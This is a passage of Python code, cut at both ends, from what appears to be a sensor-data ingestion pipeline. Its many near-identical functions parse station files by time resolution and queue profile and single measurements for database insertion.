num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
            param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_thirty_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_thirty_min_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
time_columns = file.get('time_columns')
to_utc = file.get('to_utc')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_thirty_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_twenty_min_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_twenty_min_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_twenty_min_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_twenty_min_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
            param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_twenty_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_twenty_min_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
time_columns = file.get('time_columns')
to_utc = file.get('to_utc')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
        insert_to_twenty_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_fifteen_min_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_fifteen_min_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_fifteen_min_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_fifteen_min_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
            param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_fifteen_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_fifteen_min_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
time_columns = file.get('time_columns')
to_utc = file.get('to_utc')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
        insert_to_fifteen_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_ten_min_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_ten_min_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_ten_min_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_ten_min_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
            param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_ten_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_ten_min_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
time_columns = file.get('time_columns')
to_utc = file.get('to_utc')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
        insert_to_ten_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_five_min_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_five_min_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_five_min_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_five_min_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
    header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_five_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_five_min_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_five_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_one_min_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_one_min_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_one_min_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_one_min_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
year, week_number, weekday = ts.isocalendar()
week_first_day = (datetime.datetime.strptime('{} {} 1'.format(year, week_number), '%Y %W %w')).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
            param_formatted_data.append((sensor_id, parameter_id, 0, week_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_one_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_one_min_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
time_columns = file.get('time_columns')
to_utc = file.get('to_utc')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
year, week_number, weekday = ts.isocalendar()
week_first_day = (datetime.datetime.strptime('{} {} 1'.format(year, week_number), '%Y %W %w')).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, week_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_one_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_one_sec_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_one_sec_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_one_sec_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_one_sec_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
date_dt = datetime.datetime(ts.year, ts.month, ts.day).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
            param_formatted_data.append((sensor_id, parameter_id, 0, date_dt, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_one_sec_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_one_sec_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
time_columns = file.get('time_columns')
to_utc = file.get('to_utc')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
date_dt = datetime.datetime(ts.year, ts.month, ts.day).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, date_dt, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_one_sec_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_daily_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(day.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_daily_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_hourly_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_hourly_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_thirty_min_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_thirty_min_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_twenty_min_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
